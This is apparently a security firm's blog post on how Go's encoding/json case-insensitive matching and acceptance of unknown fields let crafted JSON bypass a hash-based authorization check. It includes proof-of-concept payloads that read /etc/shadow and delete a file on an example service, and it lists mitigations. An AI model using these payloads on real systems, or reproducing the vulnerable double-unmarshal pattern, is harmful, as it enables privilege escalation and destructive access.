Security Gaps in JSON Unmarshal: Lessons from a Go Audit

This post was written by an Anvil Secure Security Engineer.

During an audit of a Golang service, I came across an interesting section of authorization code. The application unmarshalled user-supplied JSON data into a struct to perform an integrity check. If the check failed, the request was rejected. If the check succeeded, the JSON data was unmarshalled again, this time into a map[string]interface{}, and was used at a later point in the request execution. This post explores observations made during that audit.

The Golang service used Go's standard library package for parsing JSON, encoding/json. Two default behaviors of that library could be leveraged to bypass the integrity check and escalate privileges. Two attack vectors were identified, and each relied on a different behavior of the JSON parser. It was interesting to see how each could be used to exploit the service.

Go's encoding/json Initial Observations


1. Struct Field Matching is Case-Insensitive

The library's most surprising behavior is that object keys are matched to the struct field name or tag in a case-insensitive manner. GitHub issue #14750, which was created in 2016, is about this behavior.

The mailing thread linked in the issue gives the following example:

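package main

import (
    "encoding/json"
    "fmt"
)

type Header struct {
    Alg string `json:"alg"`
    Typ string `json:"typ"`
}

func main() {
    b := []byte(`{"typ":"JWS","alg":"HS256","ALG":"none"}`)
    var h Header
    if err := json.Unmarshal(b, &h); err != nil {
        fmt.Println("unmarshal error:", err)
        return
    }
    fmt.Println(h) // prints {none JWS}
}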

Parsing {"typ":"JWS","alg":"HS256","ALG":"none"} into the Header struct results in Header.Alg having the value none instead of the expected value HS256.

This is confusing given that the json.Unmarshal documentation states that exact matches are preferred:

  • To unmarshal JSON into a struct, Unmarshal matches incoming object keys to the keys used by Marshal (either the struct field name or its tag), preferring an exact match but also accepting a case-insensitive match.

The reality is that Go will accept the last key parsed that matches regardless of its case.
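A minimal sketch of that last-match behavior, reusing the Header struct from the example above. The algFor helper is a hypothetical name introduced only for illustration. Swapping the order of the two keys changes which value ends up in the field.

```go
package main

import (
	"encoding/json"
	"fmt"
)

type Header struct {
	Alg string `json:"alg"`
	Typ string `json:"typ"`
}

// algFor is a hypothetical helper: it unmarshals raw into a Header
// and returns whatever value ended up in the Alg field.
func algFor(raw string) string {
	var h Header
	if err := json.Unmarshal([]byte(raw), &h); err != nil {
		return "error: " + err.Error()
	}
	return h.Alg
}

func main() {
	// Exact-case key first, differently cased key last.
	fmt.Println(algFor(`{"alg":"HS256","ALG":"none"}`))
	// Same keys in the opposite order.
	fmt.Println(algFor(`{"ALG":"none","alg":"HS256"}`))
}
```

With encoding/json, the first call yields none and the second yields HS256: the key that appears last decides the value, whether or not it is the exact-case one.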

Considering the number of related issues on GitHub, this is a common pain point.


2. Unknown Fields Are Allowed By Default

By default, the parser does not return an error if the JSON object has keys that do not match any of the struct's fields. This can be useful if you want to only match a subset of fields in the object. Thankfully, it is possible to configure the decoder to return an error instead using Decoder.DisallowUnknownFields().
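As a rough illustration of that option, the sketch below decodes through a json.Decoder with DisallowUnknownFields enabled. The decodeStrict helper and the "kid" key are assumptions made up for this example. Note that the option only concerns keys with no matching field; it does not change the case-insensitive matching described earlier.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

type Header struct {
	Alg string `json:"alg"`
	Typ string `json:"typ"`
}

// decodeStrict is a hypothetical helper that decodes raw into a Header
// and returns an error if the object contains a key with no matching field.
func decodeStrict(raw string) (Header, error) {
	var h Header
	dec := json.NewDecoder(strings.NewReader(raw))
	dec.DisallowUnknownFields()
	err := dec.Decode(&h)
	return h, err
}

func main() {
	// "kid" is not a field of Header, so the strict decoder rejects it.
	_, err := decodeStrict(`{"alg":"HS256","typ":"JWS","kid":"1"}`)
	fmt.Println("unknown key rejected:", err != nil)

	// A differently cased key still counts as a match, not as unknown.
	h, err := decodeStrict(`{"alg":"HS256","ALG":"none"}`)
	fmt.Println(h.Alg, err)
}
```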


3. Duplicate Fields Are Allowed

Although this behavior was not exploited during the audit, it's worth mentioning that the parser will not return an error if duplicate object keys are present. As mentioned earlier, the parser will accept the last case-insensitive match. This is a known issue discussed in #48298.

In the example above, parsing {"typ":"JWS","alg":"HS256","alg":"none"} would result in Header.Alg having the value none.

This can become an issue when JSON data is handled in a multi-language environment. Parser differentials can result in security issues, like CVE-2017-12635, where the Erlang-based JSON parser used the first matching key and the JavaScript-based parser used the last matching key.
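Since encoding/json does not report duplicates itself, one option is to scan the token stream before unmarshalling. The following is only a sketch under that assumption: findDuplicateKey and checkValue are hypothetical helpers, and they detect exact duplicates only, not keys that differ in case.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// checkValue consumes one JSON value from dec and returns an error
// for the first duplicate object key it encounters at any depth.
func checkValue(dec *json.Decoder) error {
	tok, err := dec.Token()
	if err != nil {
		return err
	}
	delim, ok := tok.(json.Delim)
	if !ok {
		return nil // scalar value, nothing to check
	}
	switch delim {
	case '{':
		seen := map[string]bool{}
		for dec.More() {
			keyTok, err := dec.Token()
			if err != nil {
				return err
			}
			key, ok := keyTok.(string)
			if !ok {
				return fmt.Errorf("unexpected token %v", keyTok)
			}
			if seen[key] {
				return fmt.Errorf("duplicate key %q", key)
			}
			seen[key] = true
			if err := checkValue(dec); err != nil {
				return err
			}
		}
	case '[':
		for dec.More() {
			if err := checkValue(dec); err != nil {
				return err
			}
		}
	}
	// Consume the closing '}' or ']'.
	_, err = dec.Token()
	return err
}

// findDuplicateKey is a hypothetical entry point for the check.
func findDuplicateKey(raw string) error {
	return checkValue(json.NewDecoder(strings.NewReader(raw)))
}

func main() {
	fmt.Println(findDuplicateKey(`{"typ":"JWS","alg":"HS256","alg":"none"}`))
	fmt.Println(findDuplicateKey(`{"typ":"JWS","alg":"HS256"}`))
}
```

The same key may legitimately appear in two different objects, so the seen set is kept per object rather than per document.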

Service Example

The behaviors above are not exploitable on their own. They require the right conditions to be present, and the service I was auditing had those conditions. The gist of the interaction is:

  • An authenticated user makes a request to the control plane to access another service
  • If successful, a token and a JSON blob are returned. The token is signed and includes a SHA-256 hash of the JSON blob
  • The user sends a request to the other service with parameters, the token, and the JSON blob
  • The service verifies the request by extracting the hash from the token and comparing it with the hash of the provided JSON blob
  • If the hashes do not match, the request is rejected
  • If they do match, the request is processed

(In case you are wondering, there were valid reasons the JSON blob was not included in the signed token.)

The interesting part of the verification code was that it performed json.Unmarshal twice, first unmarshalling into a struct to perform the verification, and then into a map[string]interface{} if the verification passed.

The verification code looked something like this:

type ActionToVerify struct {
    Resources []string `json:"resources"`
    Read      bool     `json:"read"`
    Write     bool     `json:"write"`
}

type AuthDataToVerify struct {
    AllowedActions []ActionToVerify `json:"allowed_actions"`
}

func generateHash(data AuthDataToVerify) (string, string) {
    dataStr, _ := json.Marshal(data)
    hash := sha256.Sum256(dataStr)
    hashHex := hex.EncodeToString(hash[:])
    return hashHex, string(dataStr)
}

func verifyPermissions(hash, userAuthData string) (map[string]any, error) {
    var authData AuthDataToVerify
    var verified map[string]any

    err := json.Unmarshal([]byte(userAuthData), &authData)
    if err != nil {
        return nil, err
    }

    hashHex, _ := generateHash(authData)

    if hashHex != hash {
        return nil, fmt.Errorf("hash mismatch. got %s", hashHex)
    }

    err = json.Unmarshal([]byte(userAuthData), &verified)
    if err != nil {
        return nil, err
    }

    return verified, nil
}

The data returned by the verification function was used later and was converted to a different type according to the type of resource the user requested. Each of these types had map[string]interface{} as its underlying type. For example, if the user requested to perform an action on a file, the map[string]interface{} data would be converted to a FileAction type.

type FileAction map[string]interface{}

const (
    FA_Resources = "resources"
    FA_Read      = "read"
    FA_Write     = "write"
    FA_Delete    = "delete"
)

type FileActionParameters struct {
    Action     string
    TargetFile string
    WriteData  []byte
    // ...
}

func (a FileAction) CanRead(file string) bool {
    for _, perm := range a["allowed_actions"].([]interface{}) {
        perm := perm.(map[string]interface{})
        resource, err := getStringSlice(perm, "resources")
        if err != nil {
            break
        }

        if slices.Contains(resource, file) {
            return perm[FA_Read].(bool)
        }
    }

    return false
}

func (a FileAction) Process(params FileActionParameters) (string, error) {
    switch params.Action {
    case FA_Read:
        if a.CanRead(params.TargetFile) {
            return readFile(params.TargetFile)
        }
    case FA_Delete:
        if a.CanDelete(params.TargetFile) {
            return deleteFile(params.TargetFile)
        }
    }

    return "", fmt.Errorf("unauthorized")
}

One clear issue with this design is the weak contract between the verification function and the FileAction type. Not only is this error-prone, but it also increases the maintenance burden: the fields used in the FileAction type must also be defined on the struct used during verification. From a language-theoretic security (LangSec) perspective, unmarshalling the data a second time into a map[string]interface{} breaks the service's assumption that the data adheres to the ActionToVerify struct it was verified against.
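One way to tighten that contract is to parse once and hand the verified struct itself to the authorization logic. The sketch below illustrates the idea only; it is not the fix applied to the audited service, and the names Action, AuthData, hashOf, and verifyOnce are hypothetical.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"slices"
)

type Action struct {
	Resources []string `json:"resources"`
	Read      bool     `json:"read"`
	Write     bool     `json:"write"`
}

type AuthData struct {
	AllowedActions []Action `json:"allowed_actions"`
}

// hashOf re-marshals the typed data and hashes the result.
func hashOf(d AuthData) (string, error) {
	b, err := json.Marshal(d)
	if err != nil {
		return "", err
	}
	sum := sha256.Sum256(b)
	return hex.EncodeToString(sum[:]), nil
}

// verifyOnce parses raw a single time and returns the same typed value
// that was hashed, so the checked data and the used data cannot diverge.
func verifyOnce(hash, raw string) (AuthData, error) {
	var d AuthData
	if err := json.Unmarshal([]byte(raw), &d); err != nil {
		return AuthData{}, err
	}
	got, err := hashOf(d)
	if err != nil {
		return AuthData{}, err
	}
	if got != hash {
		return AuthData{}, fmt.Errorf("hash mismatch")
	}
	return d, nil
}

// CanRead works on typed fields instead of map lookups and type assertions.
func (d AuthData) CanRead(file string) bool {
	for _, a := range d.AllowedActions {
		if slices.Contains(a.Resources, file) {
			return a.Read
		}
	}
	return false
}

func main() {
	signed := AuthData{AllowedActions: []Action{
		{Resources: []string{"/home/user/file.txt"}, Read: true},
	}}
	hash, _ := hashOf(signed)

	// Payload with an extra, differently cased key.
	raw := `{"allowed_actions":[{"read":true,"resources":["/etc/shadow"]}],
	         "ALLOWED_ACTIONS":[{"read":true,"resources":["/home/user/file.txt"]}]}`

	d, err := verifyOnce(hash, raw)
	fmt.Println(err, d.CanRead("/etc/shadow"), d.CanRead("/home/user/file.txt"))
}
```

The decoder still accepts the case-variant key here, but because the struct that was hashed is the struct that is consulted, the extra grant never reaches the authorization check.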

Attack Vector #1

The first attack vector leveraged case-insensitive field matching. We know that encoding/json matches struct fields case-insensitively and uses the last match. Maps with string keys, on the other hand, are case-sensitive and thus won't overwrite previously parsed keys that differ only in their case.
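The difference between the two targets can be seen in a small sketch that unmarshals the same input into both. It reuses the Header struct from earlier; parseBoth is a hypothetical helper added for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
)

type Header struct {
	Alg string `json:"alg"`
	Typ string `json:"typ"`
}

// parseBoth unmarshals the same bytes into a struct and into a map.
func parseBoth(raw string) (Header, map[string]any, error) {
	var h Header
	if err := json.Unmarshal([]byte(raw), &h); err != nil {
		return Header{}, nil, err
	}
	var m map[string]any
	if err := json.Unmarshal([]byte(raw), &m); err != nil {
		return Header{}, nil, err
	}
	return h, m, nil
}

func main() {
	h, m, err := parseBoth(`{"alg":"HS256","ALG":"none"}`)
	if err != nil {
		fmt.Println("unmarshal error:", err)
		return
	}
	// The struct field holds the last case-insensitive match.
	fmt.Println("struct Alg:", h.Alg)
	// The map keeps both keys as separate entries.
	fmt.Println("map alg:", m["alg"], "map ALG:", m["ALG"])
}
```

The struct ends up with none, while the map holds HS256 under alg and none under ALG. Any code that checks one representation and acts on the other sees two different documents.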

In the verification function, the integrity check was performed on the AuthDataToVerify struct.

type ActionToVerify struct {
    Resources []string `json:"resources"`
    Read      bool     `json:"read"`
    Write     bool     `json:"write"`
}

type AuthDataToVerify struct {
    AllowedActions []ActionToVerify `json:"allowed_actions"`
}

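The root of this attack vector is providing the key allowed_actions with the desired grant and then specifying the key again, but with a different case, carrying the grant that was originally signed. Any one letter can be changed. The struct keeps only the last match, so the hash still checks out, while the map keeps both keys and the service later reads the exact-case allowed_actions entry.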

func vector1() {
    fmt.Println("\nVector #1:")
    hash, jsonStr := generateHash(AuthDataToVerify{
        AllowedActions: []ActionToVerify{
            {
                Resources: []string{"/home/user/file.txt"},
                Read:      true,
            },
        },
    })

    fmt.Printf("%s: %s\n", hash, jsonStr)

    var normalHash = hash
    var normalAuthData = `
    {
        "allowed_actions":[
            {"read": true, "resources": ["/etc/shadow"]}

        ],
        "ALLOWED_ACTIONS":[
            {"read": true, "resources": ["/home/user/file.txt"]}
        ]
    }`

    data, err := verifyPermissions(normalHash, normalAuthData)
    if err != nil {
        fmt.Printf("Failed to verify: %s\n", err)
        return
    }

    fmt.Printf("User permissions verified.\nGot: '%+v'\n", data)
    action := FileAction(data)
    output, err := action.Process(FileActionParameters{
        Action:     "read",
        TargetFile: "/etc/shadow",
    })
    fmt.Printf("Processed. \nError: %+v\nOutput: %+v\n", err, output)
}

Running the example, we get the following output:

Vector #1:
8109cdf7567fec8e513b82e19cdae36ce08a6483760dec6375cf58ac3d6fe45c: {"allowed_actions":[{"resources":["/home/user/file.txt"],"read":true,"write":false}]}
User permissions verified.
Got: 'map[ALLOWED_ACTIONS:[map[read:true resources:[/home/user/file.txt]]] allowed_actions:[map[read:true resources:[/etc/shadow]]]]'
Processed. 
Error: <nil>
Output: Read /etc/shadow

Attack Vector #2

Earlier I mentioned that the design is error-prone. The fields used in the FileAction type must also be defined on the struct used during verification. This attack relied on the default behavior of allowing unknown fields.

You may have noticed that the FileAction type defined a key, FA_Delete, that was not present in the verifier.

const (
    FA_Resources = "resources"
    FA_Read      = "read"
    FA_Write     = "write"
    FA_Delete    = "delete"
)

Since this field is not defined on the ActionToVerify struct, it is not accounted for when calculating the hash. An attacker can modify the JSON blob to include this field.
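To see why the hash is unaffected, consider what survives the unmarshal and re-marshal round trip that the verifier performs before hashing. In this sketch, roundTrip is a hypothetical helper; ActionToVerify is the struct from the verification code.

```go
package main

import (
	"encoding/json"
	"fmt"
)

type ActionToVerify struct {
	Resources []string `json:"resources"`
	Read      bool     `json:"read"`
	Write     bool     `json:"write"`
}

// roundTrip unmarshals raw into ActionToVerify and marshals it back,
// which is what the verifier effectively hashes.
func roundTrip(raw string) (string, error) {
	var a ActionToVerify
	if err := json.Unmarshal([]byte(raw), &a); err != nil {
		return "", err
	}
	out, err := json.Marshal(a)
	return string(out), err
}

func main() {
	out, err := roundTrip(`{"delete": true, "read": true, "resources": ["/home/user/file.txt"]}`)
	fmt.Println(out, err)
	// prints {"resources":["/home/user/file.txt"],"read":true,"write":false} <nil>
}
```

The delete key is silently dropped, so the bytes being hashed are identical with or without it.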

func vector2() {
    fmt.Println("\nVector #2:")
    hash, jsonStr := generateHash(AuthDataToVerify{
        AllowedActions: []ActionToVerify{
            {
                Resources: []string{"/home/user/file.txt"},
                Read:      true,
            },
        },
    })

    fmt.Printf("%s: %s\n", hash, jsonStr)

    var normalHash = hash
    var normalAuthData = `
    {
        "allowed_actions":[
            {"delete": true, "read": true, "resources": ["/home/user/file.txt"]}


        ]
    }`

    data, err := verifyPermissions(normalHash, normalAuthData)
    if err != nil {
        fmt.Printf("Failed to verify: %s\n", err)
        return
    }

    fmt.Printf("User permissions verified.\nGot: '%+v'\n", data)
    action := FileAction(data)
    output, err := action.Process(FileActionParameters{
        Action:     "delete",
        TargetFile: "/home/user/file.txt",
    })
    fmt.Printf("Processed. \nError: %+v\nOutput: %+v\n", err, output)
}

Running the example, we get the following output:

Vector #2:
8109cdf7567fec8e513b82e19cdae36ce08a6483760dec6375cf58ac3d6fe45c: {"allowed_actions":[{"resources":["/home/user/file.txt"],"read":true,"write":false}]}
User permissions verified.
Got: 'map[allowed_actions:[map[delete:true read:true resources:[/home/user/file.txt]]]]'
Processed. 
Error: <nil>
Output: Deleted /home/user/file.txt

Closing Remarks

The example shown here is quite specific. In the real service, there were numerous levels of indirection and abstraction. The codebase is about ten years old, which may have been a factor in some of the design choices. Instead of parsing the JSON, the hash could have been computed over the raw JSON string, which would have prevented these attacks.
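A minimal sketch of hashing the raw string, assuming the control plane signs a hash of the exact bytes it hands out. The hashRaw and verifyRaw names are hypothetical, and the constant-time comparison is a choice made for this sketch rather than something taken from the audited code.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// hashRaw returns the hex-encoded SHA-256 of the exact bytes of raw.
func hashRaw(raw string) string {
	sum := sha256.Sum256([]byte(raw))
	return hex.EncodeToString(sum[:])
}

// verifyRaw checks the hash over the bytes as received and only then
// parses them, so any added or altered key changes the hash.
func verifyRaw(hashHex, raw string) (map[string]any, error) {
	want, err := hex.DecodeString(hashHex)
	if err != nil {
		return nil, err
	}
	sum := sha256.Sum256([]byte(raw))
	if subtle.ConstantTimeCompare(sum[:], want) != 1 {
		return nil, errors.New("hash mismatch")
	}
	var verified map[string]any
	if err := json.Unmarshal([]byte(raw), &verified); err != nil {
		return nil, err
	}
	return verified, nil
}

func main() {
	issued := `{"allowed_actions":[{"resources":["/home/user/file.txt"],"read":true}]}`
	hash := hashRaw(issued)

	_, err := verifyRaw(hash, issued)
	fmt.Println("original:", err)

	tampered := `{"allowed_actions":[{"delete":true,"resources":["/home/user/file.txt"],"read":true}]}`
	_, err = verifyRaw(hash, tampered)
	fmt.Println("tampered:", err)
}
```

The trade-off is that the blob must be passed along byte for byte; any re-encoding between issuer and verifier would change the hash.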

That said, if Unmarshal always preferred an exact match for field names, attack vector one would have been prevented. If the default behavior were to reject unknown fields, or if the developer had used Decoder.DisallowUnknownFields(), attack vector two would have been prevented.

Notably, some libraries already take preventative measures. For example, go-jose/go-jose has a fork of the standard library parser that uses case-sensitive matching and duplicate key checks.

Both of these issues are planned to be resolved in encoding/json/v2. You can track the proposal at #71497.

About the Author

The author of this blog post is an Anvil Secure Security Engineer who specializes in network pentesting, cloud security, and programming languages.
